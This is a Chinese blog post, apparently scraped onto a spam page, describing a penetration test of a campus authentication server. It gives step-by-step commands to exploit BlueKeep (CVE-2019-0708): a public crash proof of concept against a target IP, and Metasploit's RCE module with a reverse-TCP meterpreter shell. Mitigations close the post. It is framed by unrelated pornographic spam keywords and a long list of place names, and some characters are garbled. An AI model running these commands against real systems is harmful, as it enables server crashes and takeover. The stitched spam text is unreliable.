国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

記一次校園網(wǎng)滲透測(cè)試

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:發(fā)文前已將漏洞反饋至校園信息中心,菜雞投稿,如有不對(duì)的地方還請(qǐng)各位大佬指正

設(shè)備連接校園網(wǎng)跳轉(zhuǎn)到了銳捷校園網(wǎng)認(rèn)證界面

得到校園網(wǎng)服務(wù)器地址:10.25.254.11

通過(guò)nmap工具掃描端口發(fā)現(xiàn)以下端口開放

發(fā)現(xiàn)服務(wù)器的3389端口開放,推測(cè)3389端口可能存在 cve-2019-0708漏洞

利用msf工具進(jìn)行掃描,發(fā)現(xiàn)服務(wù)器確實(shí)存在該漏洞,通過(guò)該漏洞我們可以獲取服務(wù)器控制權(quán)或?qū)Ψ?wù)器發(fā)起藍(lán)屏攻擊,使服務(wù)器癱瘓,或獲取服務(wù)器shell。

1.對(duì)服務(wù)器發(fā)動(dòng)藍(lán)屏攻擊(本次攻擊未攻擊校園網(wǎng)服務(wù)器,搭建了相同環(huán)境的靶機(jī)進(jìn)行測(cè)試)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下載完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目標(biāo)ip

運(yùn)行工具后靶機(jī)藍(lán)屏

2.利用該漏洞獲取目標(biāo)shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模塊

輸入命令use?exploit/windows/rdp/cve_2019_0708_bluekeep_rce


設(shè)置目標(biāo):輸入命令set rhosts 192.168.1.108

使用payload:輸入命令set payload windows/x64/meterpreter/reverse_tcp

設(shè)置主機(jī)架構(gòu):set target 2


執(zhí)行,獲取服務(wù)器shell

獲取服務(wù)器shell后就可以為所欲為了,校園網(wǎng)認(rèn)證服務(wù)器開放的其它端口也存在一些漏洞,目前已將漏洞反饋至校園信息中心,本次滲透未影響服務(wù)器正常運(yùn)行


解決方案:

1.在運(yùn)行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系統(tǒng)上啟用網(wǎng)絡(luò)級(jí)身份驗(yàn)證 (NLA)

2.在企業(yè)邊界防火墻處阻止 TCP 端口 3389


記一次校園網(wǎng)滲透測(cè)試的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
抚顺市| 长汀县| 双江| 广宗县| 绥宁县| 永城市| 平塘县| 大兴区| 望谟县| 武安市| 山东省| 诸暨市| 盘锦市| 信丰县| 江西省| 高平市| 牙克石市| 江口县| 酒泉市| 平谷区| 建瓯市| 芷江| 读书| 运城市| 仪陇县| 永新县| 高要市| 苍梧县| 闻喜县| 筠连县| 平果县| 浏阳市| 永年县| 邻水| 淄博市| 遂溪县| 郴州市| 同江市| 江源县| 河源市| 瓦房店市|